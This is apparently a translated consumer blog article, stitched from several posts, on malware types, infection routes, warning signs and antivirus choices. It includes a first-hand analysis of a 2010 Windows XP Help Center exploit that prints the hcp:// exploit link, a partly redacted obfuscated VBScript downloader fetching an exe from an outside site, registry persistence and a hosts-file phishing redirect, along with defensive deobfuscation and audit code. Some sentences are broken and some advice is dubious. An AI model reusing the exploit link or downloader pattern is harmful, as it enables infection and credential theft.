Virus protection! What are Trojans, Spies, Rootkits? How to protect your computer from viruses? Computer viruses. Types, ways of infection

Hello again.
The topic of today's article: types of computer viruses, how they work, and how computers get infected with them.

What are computer viruses in general.

A computer virus is a specially written program or set of algorithms written for a purpose such as a joke, harming someone's computer, gaining access to your computer, intercepting passwords or extorting money. Viruses can copy themselves and infect your programs and files, as well as boot sectors, with malicious code.

Types of malware.

Malware can be divided into two main types: viruses and worms.


Viruses - spread through a malicious file that you could download from the Internet or that may turn up on a pirated disc; they are also often sent via Skype under the guise of useful programs (I have noticed that schoolchildren often run into the latter: they are supposedly given a mod for a game or cheats, but in fact it may be a virus that can do harm).
A virus inserts its code into one of your programs, or disguises itself as a separate program in a place users usually do not look (operating system folders, hidden system folders).
A virus cannot start on its own until you launch the infected program yourself.
Worms - infect many files on your computer, for example all exe files, system files, boot sectors, etc.
Worms most often penetrate the system on their own, using vulnerabilities in your OS, your browser, or a particular program.
They can get in through chats and communication programs such as Skype and ICQ, and can be distributed via e-mail.
They can also sit on websites and use a vulnerability in your browser to penetrate your system.
Worms can spread over a local network: if one of the computers on the network becomes infected, the worm can spread to the other computers, infecting all files in its path.
Worms tend to be written for the most popular programs. For example, the most popular browser now is Chrome, so scammers will try to write for it and place malicious code for it on sites, because it is often more interesting to infect thousands of users of a popular program than a hundred users of an unpopular one. That said, Chrome is constantly improving its security.
The best protection against network worms is to update your programs and your operating system. Many people neglect updates, which they often regret.
Several years ago I noticed the following worm.

But it obviously did not get in through the Internet, but most likely through a pirated disc. The essence of its work was as follows: it supposedly created a copy of each folder on a computer or on a USB flash drive. But in fact it created not a folder but an exe file. When you click on such an exe file, it spreads even further through the system. And so you have just got rid of it, you go to a friend with a flash drive, copy some music from him, and you come back with a flash drive infected with the same worm and have to remove it all over again. I don't know if this virus caused any other harm to the system, but soon this virus ceased to exist.

The main types of viruses.

In fact, there are many types and varieties of computer threats, and it is simply impossible to cover them all. Therefore, we will look at the ones that have been most common recently and the most unpleasant.
Viruses are:
- File - located in an infected file and activated when the user runs that program; they cannot activate themselves.
- Boot - can be loaded when Windows boots, by getting into startup, when a USB flash drive is inserted, and the like.
- Macro viruses - various scripts that can be located on a site or sent to you by mail or in Word and Excel documents; they perform certain functions built into the computer and exploit vulnerabilities in your programs.

Types of viruses.
- Trojans
- Spies
- Ransomware
- Vandals
- Rootkits
- Botnet
- Keyloggers
These are the most common types of threats that you may encounter. But in reality there are many more.
Some viruses can even combine and contain several types of these threats at once.
- Trojans. The name comes from the Trojan horse. A Trojan gets onto your computer under the guise of a harmless program, and can then open access to your computer or send your passwords to its owner.
Recently, Trojans known as stealers have become widespread. They can steal passwords saved in your browser, in games and in mail clients. Immediately after launch, a stealer copies your passwords and sends them to the attacker's e-mail or hosting. All that remains for the attacker is to collect your data, which is then either sold or used for the attacker's own purposes.
- Spyware tracks user actions: which sites the user visits and what the user does on the computer.
- Ransomware. This includes winlockers. The program completely blocks access to the computer and demands money for unlocking, for example by topping up an account and so on. If you get caught by this, in no case should you send money: the computer will not be unlocked for you, and you will lose the money. Go straight to the Dr.Web website, where you can find out how to unlock many winlockers by entering a certain code or performing certain actions. Some winlockers can disappear on their own, for example after a day.
- Vandals can block access to antivirus sites, to the antivirus itself and to many other programs.
- Rootkits - hybrid viruses. They can contain various viruses. They can gain access to your PC, giving a person complete access to your computer, and they can embed themselves at the kernel level of your OS. They came from the world of Unix systems. They can mask various viruses and collect data about the computer and all of its processes.
- Botnets are quite an unpleasant thing. Botnets are huge networks of infected "zombie" computers that can be used to DDoS sites and for other cyber attacks carried out from the infected computers. This type is very common and difficult to detect; even antivirus companies may not be aware of their existence for a long time. Many people can be infected and not even suspect it. You are no exception, and maybe neither am I.
- Keyloggers. They intercept everything that you type on the keyboard (sites, passwords) and send it to their owner.

Ways of infection with computer viruses.

The main routes of infection.
- Operating system vulnerability.
- Browser vulnerability.
- Antivirus quality is lame.
- User stupidity.
- Removable media.
OS vulnerability - no matter how hard developers try to build protection into an OS, security holes are found over time. Most viruses are written for Windows, as it is the most popular operating system. The best defense is to keep your operating system up to date and try to use a newer version.
Browsers - infection happens through browser vulnerabilities, especially, again, if the browser is old. This too is cured by frequent updates. There may also be problems if you download browser plugins from third-party resources.
Antivirus - free antiviruses have less functionality than paid ones, although paid ones do not give 100% results in defense either and can misfire. But it is desirable to have at least a free antivirus. I already wrote about free antiviruses in this one.
User stupidity - clicking on banners, following suspicious links from e-mails, installing software from suspicious places, etc.
Removable media - viruses can be installed automatically from infected and specially prepared flash drives and other removable media. Not so long ago, the world heard about the BadUSB vulnerability.

Types of infected objects.

Files - viruses infect your programs, system files and regular files.
Boot sectors - memory-resident viruses. As the name implies, they infect the boot sectors of the computer, add their code to the computer's startup and are launched when the operating system starts. Sometimes they are well disguised, which makes them difficult to remove from startup.
Macros - Word documents, Excel documents and the like. Using macros and vulnerabilities in Microsoft Office tools, the virus injects its malicious code into your operating system.

Signs of a computer virus infection.

The appearance of some of these signs does not necessarily mean there is a virus in the system. But if they are present, it is recommended to check your computer with an antivirus or contact a specialist.
One of the common signs is heavy load on the computer: your computer runs slowly although you do not seem to have anything running that could load it heavily. But if you have an antivirus, note that antiviruses themselves load the computer considerably. If there is no such software that could be causing the load, then viruses are more likely. In general, I advise you to reduce the number of programs that launch at startup.

can also be one of the signs of infection.
But not all viruses put a heavy load on the system; with some, it is difficult to notice any changes.
System errors. Drivers stop working, some programs start to work incorrectly or often crash with an error, although this was not noticed before. Or programs start to restart frequently. Of course, this also happens because of antiviruses: for example, the antivirus deleted a system file by mistake, considering it malicious, or deleted a really infected file that was tied to the program's system files, and the removal led to such errors.


Ads appear in browsers, or banners even start to appear on the desktop.
Non-standard sounds appear while the computer is running (squeaks, clicks for no apparent reason, and the like).
The CD/DVD drive opens by itself, or starts reading a disc although there is no disc in it.
The computer takes a long time to turn on or off.
Hijacked passwords. If you notice that spam is being sent on your behalf from your mailbox or social network page, it is likely that a virus has penetrated your computer and passed your passwords to its owner. If you notice this, I recommend checking with an antivirus without fail (although it is not a fact that this is how the attacker got your password).
Frequent access to the hard disk. Each computer has an indicator that blinks when programs are in use or when files are being copied, downloaded or moved. For example, your computer has just been turned on and no programs are in use, yet the indicator starts blinking frequently as if programs were being used. These are already viruses at the level of the hard disk.

Here, in fact, we have examined the computer viruses that you may encounter on the Internet. But in reality there are many times more of them, and it is not possible to protect yourself fully, except perhaps by not using the Internet, not buying discs and not turning on the computer at all.

From my childhood I was tormented by the question: "How does a computer get infected with viruses?" Finally I found out and felt it for myself. Why not tell the world how this very entertaining process actually goes.

So as not to write a manual on infection, which, God forbid, a lot of people would then use, I will delete some parts of the scripts.

Everyone is probably already fed up with phrases about the "leakiness" of MS Windows, but nevertheless it remains the most widespread system on planet Earth. Or maybe the system is so full of holes because of its prevalence.

And so, the attack was carried out on one of the vulnerabilities of Windows XP, namely in the Windows Help Center.

The story, as usual, began a long time ago (back in 2010); you can read about it on the very well-known resource xakep.ru (at the very bottom of the page).

It all started simply.

IE issued a request to open a program from the tjyre.info resource. Obviously a virus! But it's interesting!!

Going to the site http://tjyre.info gives no information except that the site is under construction (at the time of publishing this post it does not work at all; apparently it has been shut down).

How do I find out what was intended for my computer? Elementary - you need to look at where the link leads.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A...%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

As my ignorance tells me, the link to the virus file is hidden behind the numbers.

Through simple transformations, it turns out that behind the numbers is a command that copies a script named l.vbs to the system folder of my computer and then launches it.

The address where the script is located on the network:


http://tjyre.info/games/hcp_vbs.php?f=17

The file that opens contains the following text:

«w = 3000: x = 200: y = 1: z = false: a = "http://tjyre.info/u.php?e=7&f=17": Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")): Set f = e.GetSpecialFolder(2): b = f & "\exe.ex2": b = Replace(b, Month("2010-02-16"), "e"): OT = "GET": Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")): Set d = CreateObject(StrReverse("maertS.BDODA")) ... Removed for stupid reasons ... g = o.GetFile(b): g.Delete»

The text is quite simple:

    we see the date 02/16/2010 (it turns out that some kind of masking of the virus by date is carried out; they have worked out that it needs to be masked)

    we see the commands turned inside out (using reversal), with the help of which the virus file flies onto our computer.
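
Both tricks in the quoted fragment can be undone mechanically when analysing such a script. The following is an added example, not code from the original post: it folds the StrReverse literals back into readable COM object names and evaluates the constant Month call (VBScript's Month returns the month number, so Month("2010-02-16") is 2 and the Replace turns exe.ex2 into exe.exe). The function names and role labels are assumptions made for the example, and the sample is retyped from the readable statements of the fragment above.

```python
import re
from datetime import date

# VBScript is case-insensitive, so the patterns are too.
STRREVERSE = re.compile(r'\bStrReverse\s*\(\s*"([^"]*)"\s*\)', re.I)
MONTH = re.compile(r'\bMonth\s*\(\s*"\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*"\s*\)', re.I)
CONCAT = re.compile(r'(\w+)\s*=\s*\w+\s*&\s*"([^"]*)"')
REPLACE = re.compile(
    r'(\w+)\s*=\s*Replace\s*\(\s*(\w+)\s*,\s*"?([^",]+?)"?\s*,\s*"([^"]*)"\s*\)', re.I)

# COM objects that, used together, fetch a file and write it to disk
# (role labels are this example's own wording).
ROLES = {
    "scripting.filesystemobject": "file system access",
    "msxml2.xmlhttp": "HTTP download",
    "adodb.stream": "binary write to disk",
}

def deobfuscate(script):
    """Fold StrReverse("...") and Month("yyyy-mm-dd") into plain constants."""
    script = STRREVERSE.sub(lambda m: '"%s"' % m.group(1).strip()[::-1], script)
    return MONTH.sub(lambda m: str(date(*map(int, m.groups())).month), script)

def hidden_progids(script):
    """List (ProgID, role) for reversed literals that name a known COM object."""
    plain = [m.group(1).strip()[::-1] for m in STRREVERSE.finditer(script)]
    return [(p, ROLES[p.lower()]) for p in plain if p.lower() in ROLES]

def dropped_names(script):
    """Apply constant Replace() calls to concatenated file-name literals.

    Only the literal is modelled; the folder prefix is not known offline.
    """
    plain = deobfuscate(script)
    names = {m.group(1): m.group(2) for m in CONCAT.finditer(plain)}
    for target, source, old, new in REPLACE.findall(plain):
        if source in names:
            names[target] = names[source].replace(old, new)
    return names

# Sample: readable statements of the fragment quoted in the post, spacing normalised.
# GetSpecialFolder(2) is the temporary folder.
SAMPLE = (
    'Set e = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS")): '
    'Set f = e.GetSpecialFolder(2): b = f & "\\exe.ex2": '
    'b = Replace(b, Month("2010-02-16"), "e"): '
    'Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")): '
    'Set d = CreateObject(StrReverse("maertS.BDODA"))'
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    for progid, role in hidden_progids(SAMPLE):
        print("%-28s %s" % (progid, role))
    print(dropped_names(SAMPLE))
```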

A fresh readme.exe has safely settled in. What does this guest bring us? Surely a lot of fun.

The launch of readme.exe was very successfully blocked by the program antiwinlocker, for which it is honored and praised. But since I still want to see what happens, the defenders will have to be asked to step aside for a while.

The first launch of the virus was unremarkable, which is understandable: the virus got in and hid until the next boot.

Reboot and silence again. Mystery!!

We'll have to look in secret corners.

We find the file lsass.exe (imitating the system process) in the C:\Documents and Settings\Admin\Application Data folder.

In the registry, respectively, we find the key:

"userinit" = "C:\\WINDOWS\\system32\\userinit.exe, C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe" as expected.

But that is not all!

In the folder "C:\WINDOWS\system32\drivers\etc" there is the magic hosts file, to which the virus adds a dozen magic lines (please look at the WHOLE hosts file):

These lines are used to redirect from the sites Odnoklassniki ("classmates") and VKontakte to a very specific site, and also to completely break Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).
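
Both traces found above, the extra program in the Userinit value and the added hosts lines, can be checked for mechanically. This is an added example, not part of the original post; the watched domain list, the host name update.kaspersky.com, the 203.0.113.7 address and the function names are constructed for illustration. The sample hosts text places its entries below a run of blank lines, which is why the whole file has to be read.

```python
import ntpath

# Assumed watchlist: the sites the post says were redirected or cut off.
WATCHED = ("odnoklassniki.ru", "vkontakte.ru", "kaspersky.com")
LOCAL = {"127.0.0.1", "0.0.0.0", "::1"}

def audit_hosts(text, watched=WATCHED):
    """Return (line_no, ip, host, verdict) for every entry naming a watched site."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue                             # blank, comment-only or malformed
        ip, names = fields[0], fields[1:]
        for name in names:
            host = name.lower().rstrip(".")
            if any(host == d or host.endswith("." + d) for d in watched):
                verdict = "blocked" if ip in LOCAL else "redirected"
                findings.append((line_no, ip, host, verdict))
    return findings

def audit_userinit(value, system32=r"C:\WINDOWS\system32"):
    """Return every program in a Userinit value other than system32\\userinit.exe."""
    expected = ntpath.normcase(ntpath.join(system32, "userinit.exe"))
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and ntpath.normcase(ntpath.normpath(entry)) != expected:
            extras.append(entry)
    return extras

# Constructed sample: a clean first line, 40 blank lines, then the added entries.
SAMPLE_HOSTS = (
    "127.0.0.1 localhost\n" + "\n" * 40 +
    "203.0.113.7 odnoklassniki.ru www.odnoklassniki.ru\n"
    "203.0.113.7 vkontakte.ru\n"
    "127.0.0.1 update.kaspersky.com\n"
)
# Userinit value as quoted in the post (registry escaping removed).
SAMPLE_USERINIT = (r"C:\WINDOWS\system32\userinit.exe, "
                   r"C:\Documents and Settings\Admin\Application Data\lsass.exe")

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print("hosts line %d: %s assigned to %s (%s)" % finding)
    for extra in audit_userinit(SAMPLE_USERINIT):
        print("unexpected Userinit entry:", extra)
```

On a live system the Userinit value is read from the Winlogon key under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion; here it is passed in as a string so the check runs offline.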

What do we see when we go to the villain's site? We see the main page of Odnoklassniki, but if you enter your login and password, they go straight to the "villain". And if you click on any link, we get a very cool request for "account validation". Moreover, the text clearly says: "The service is not available to subscribers in some regions of Megafon". Such a serious approach to business that I did not immediately grasp the meaning of the phrase.

Actually, treating viruses is not such a difficult operation that you should pay specialists a lot of money for it. You can protect your computer from viruses or, in case of infection, return it to a "healthy" state by removing malicious programs yourself, by choosing a good antivirus program and observing some rules. Take at least the two most important ones: the first is to regularly update the anti-virus databases; the second is to fully scan your computer for viruses once a month.

So, with that, I think it's clear that malware removal is done with antivirus software. Antiviruses are paid and free; I described the free methods in the following article:

And now, what is malware, or in other words a virus?

A computer virus or malware is a program whose main purpose is to cause harm to the computer: damage to user data, theft or deletion of personal information, degraded computer performance and much more.

Today malware can be classified into several types according to its effect on the computer.

  • Classic viruses.
  • Trojan horses.
  • Spies.
  • Rootkits.
  • Adware.

Let's take a closer look at each type of malware.

Classic viruses are malicious programs that can infect a computer, for example, via the Internet. The essence of such viruses is self-propagation. Such viruses copy themselves and copy files and folders on the infected computer. They do this with the aim of infecting the data so that recovering it is impossible in the future. Such a virus tries to damage all data on the computer, inserting its code into all files, from system files to the user's personal data. Most often, the salvation, on such an infected computer, is.

A Trojan horse is a serious type of virus. Trojans are written by cybercriminals for a specific purpose, for example stealing information from computers, stealing passwords, and so on.

A Trojan is divided into two parts. The first part, called the Server, is kept by the attacker, and the second, the Client part, is distributed to all possible corners of the Internet and other places. If the client part of the malicious program gets onto a computer, this PC becomes infected and the Trojan starts covertly sending various information to the attacker.

The Trojan can also perform various operations on the computer at the request of the server (the attacker): steal passwords, infect documents and files with malicious code.

Spies are somewhat similar to Trojans. The main difference is that spies do not harm the system's or the user's files. Spyware quietly gets onto the computer and spies. It can steal passwords or even record absolutely everything that you type on the keyboard.

Spyware is the most intelligent type of virus and can even send files from an infected computer. A spy knows a lot about an infected PC: which system is installed, which antivirus you use, which browser you use, which programs are installed on the computer, and so on. Spyware is one of the most dangerous kinds of malware out there.

Rootkits are not viruses in and of themselves. Rootkits are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer is infected with a spyware virus at the same time as a rootkit, and the rootkit will try to hide the spy from your antivirus and operating system. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, Trojans) from the eyes of our antivirus for a long time!

Adware is another type of malicious software. It is a less dangerous program, and its essence is to show ads on your computer in all sorts of ways and places. Adware does no harm and does not infect or spoil files. But you also need to protect yourself from this type of virus.

These are the types of malware that exist. To protect your computer from viruses, we need a good antivirus. I talked about that in another article, and now we will continue with describing viruses and protection schemes for your computer.

Previously, viruses did not have a specific purpose; they were written out of interest, and the developer did not set a specific goal. Now viruses are highly complex algorithms whose essence is most often the theft of money and data. Trojans are usually designed only to steal passwords and other important data.

By the way, you can tell whether your computer has been attacked by viruses by some signs:

  • Programs do not work correctly or stop working altogether.
  • The computer began to slow down, work slowly.
  • Some files get corrupted, refuse to open.

Very often such signs can indicate a computer virus infection, but fortunately not always.

It should be noted that most often one particular virus can infect different types of files. Therefore, even after the computer has been cured of a strong virus attack, formatting the partitions is the most correct course.

Antivirus programs will help you protect yourself from viruses, as I said above. Today, anti-virus programs have enough features to repel almost all malicious programs that spread on the Internet. But for maximum virus protection, an important role is played by a properly selected and configured antivirus program with full "combat" performance. I recommend that you read the article about. But if you don't have time, I'll name the best anti-virus programs for you right here. Today, these are:

  • Kaspersky
  • Avast
  • Dr.Web
  • NOD32

I think there is plenty to choose from.

Good luck and excellent virus protection.